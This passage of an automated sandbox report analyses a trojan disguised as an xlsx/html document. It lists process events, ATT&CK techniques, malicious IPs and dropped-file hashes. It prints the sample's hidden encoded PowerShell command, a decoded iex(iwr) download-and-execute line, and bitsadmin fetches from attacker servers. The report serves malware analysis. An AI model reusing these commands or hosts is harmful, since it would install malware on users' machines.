Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\l\Il.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2006
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7845
Source: C:\l\Il.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nstD940.tmp\nsExec.dllJump to dropped file
Source: C:\Windows\System32\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BIT5007.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exe TID: 4596Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep count: 2006 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4808Thread sleep count: 7845 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1944Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
Source: C:\l\Il.exe TID: 2352Thread sleep count: 49 > 30
Source: C:\l\Il.exe TID: 2352Thread sleep count: 296 > 30
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\svchost.exeFile created: BIT5007.tmp.2.drJump to dropped file
Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded iex(iwr -Uri 'http://193.169.105.103/in.php?action=1').content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\l\Il.exe "C:\l\Il.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe"
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -enc aqblahgakabpahcacgagac0avqbyagkaiaanaggadab0ahaaogavac8amqa5admalgaxadyaoqauadeamaa1ac4amqawadmalwbpag4algbwaggacaa/ageaywb0agkabwbuad0amqanackalgbjag8abgb0aguabgb0aa==
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
BITS Jobs		11
Process Injection		21
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		2
Browser Extensions		1
Registry Run Keys / Startup Folder		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts4
PowerShell		1
Registry Run Keys / Startup Folder		1
DLL Side-Loading		1
BITS Jobs		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
DLL Side-Loading		1
Extra Window Memory Injection		11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Network Configuration Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Extra Window Memory Injection		DCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem21
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nstD940.tmp\nsExec.dll0%ReversingLabs
C:\l\Il.exe50%ReversingLabsWin32.Adware.Nemesis
C:\Users\user\AppData\Local\Temp\BIT5007.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.html0%Avira URL Cloudsafe
file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.html0%Avira URL Cloudsafe
http://193.169.105.103/index.php0%Avira URL Cloudsafe
http://193.169.105.103//data/background.pdf0%Avira URL Cloudsafe
http://193.169.105.103/in.php0%Avira URL Cloudsafe
http://193.169.105.103//in.php?action=00%Avira URL Cloudsafe
http://193.169.105.103/in.php?action=10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
code.jquery.com
151.101.130.137
truefalse
    		high
    www.google.com
    		142.250.181.132
    		truefalse
      		high
      use.fontawesome.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://193.169.105.103/index.phptrue
        • Avira URL Cloud: safe
        		unknown
        file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlfalse
        • Avira URL Cloud: safe
        		unknown
        http://193.169.105.103/in.php?action=1true
        • Avira URL Cloud: safe
        		unknown
        http://193.169.105.103/in.phptrue
        • Avira URL Cloud: safe
        		unknown
        file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlfalse
        • Avira URL Cloud: safe
        		unknown
        http://193.169.105.103//data/background.pdftrue
        • Avira URL Cloud: safe
        		unknown
        http://193.169.105.103//in.php?action=0true
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        172.217.19.206
        		unknownUnited States
        		15169GOOGLEUSfalse
        1.1.1.1
        		unknownAustralia
        		13335CLOUDFLARENETUSfalse
        172.67.142.245
        		unknownUnited States
        		13335CLOUDFLARENETUSfalse
        193.169.105.103
        		unknownIsrael
        		49510TCV-ASCZtrue
        172.217.17.35
        		unknownUnited States
        		15169GOOGLEUSfalse
        194.15.46.189
        		unknownunknown
        		20952VENUS-INTERNET-ASGBtrue
        142.250.181.132
        		www.google.comUnited States
        		15169GOOGLEUSfalse
        23.218.208.109
        		unknownUnited States
        		6453AS6453USfalse
        151.101.130.137
        		code.jquery.comUnited States
        		54113FASTLYUSfalse
        8.8.8.8
        		unknownUnited States
        		15169GOOGLEUSfalse
        239.255.255.250
        		unknownReserved
        		unknownunknownfalse
        142.250.181.99
        		unknownUnited States
        		15169GOOGLEUSfalse
        64.233.163.84
        		unknownUnited States
        		15169GOOGLEUSfalse

        Private

        IP
        192.168.2.16
        127.0.0.1

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1573724
        Start date and time:2024-12-12 14:36:07 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsinteractivecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:23
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • EGA enabled
        Analysis Mode:stream
        Analysis stop reason:Timeout
        Sample name:New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html
        Detection:MAL
        Classification:mal100.bank.troj.evad.win@37/20@8/145

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 142.250.181.99, 172.217.19.206, 64.233.163.84, 172.217.17.46, 172.67.142.245, 104.21.27.152, 20.3.187.198
        • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, clientservices.googleapis.com, clients.l.google.com, use.fontawesome.com.cdn.cloudflare.net, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtCreateFile calls found.
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):18200
        Entropy (8bit):5.493587756253429
        Encrypted:false
        SSDEEP:
        MD5:739E37A3A2B33CA7B0CA0FB7A81E6BA6
        SHA1:27088B95A25E3D4B6DAC1E31DC0C60BB3E860D47
        SHA-256:0F1950804971EBC81D3CA6263F0AB3611BB711DE5329D18BAB61199E066DF8CB
        SHA-512:85A1588B72D6801DD8B22009143853226E2C72D3C45391CA2C753208F12A94C568BBE9D1EEE2C0864973A0150EA57183EDB3FE2A30E69978875F9A4BC98FFD25
        Malicious:false
        Reputation:unknown
        Preview:@...e...........T....................................@..........H...............o..b~.D.poM...J..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.P.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

        C:\Users\user\AppData\Local\Temp\BIT5007.tmp

        Download File
        Process:C:\Windows\System32\svchost.exe
        File Type:PE32+ executable (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):506008
        Entropy (8bit):6.4284173495366845
        Encrypted:false
        SSDEEP:
        MD5:98CCD44353F7BC5BAD1BC6BA9AE0CD68
        SHA1:76A4E5BF8D298800C886D29F85EE629E7726052D
        SHA-256:E51021F6CB20EFBD2169F2A2DA10CE1ABCA58B4F5F30FBF4BAE931E4ECAAC99B
        SHA-512:D6E8146A1055A59CBA5E2AAF47F6CB184ACDBE28E42EC3DAEBF1961A91CEC5904554D9D433EBF943DD3639C239EF11560FA49F00E1CFF02E11CD8D3506C4125F
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.}............|.&.....|.$.J...|.%.....H}*.....H}./....H}./.....~P.....H}./.....~D.........z...F}./....F}(.....F}./....Rich............PE..d.....@f.........."....!.b.....................@.....................................'....`.................................................|...........H........4.......(......8...0I..T....................J..(....G..@............................................text....a.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....pdata...4.......6..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..8...........................@..B................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\UnRAR.exe (copy)

        Download File
        Process:C:\Windows\System32\svchost.exe
        File Type:PE32+ executable (console) x86-64, for MS Windows
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
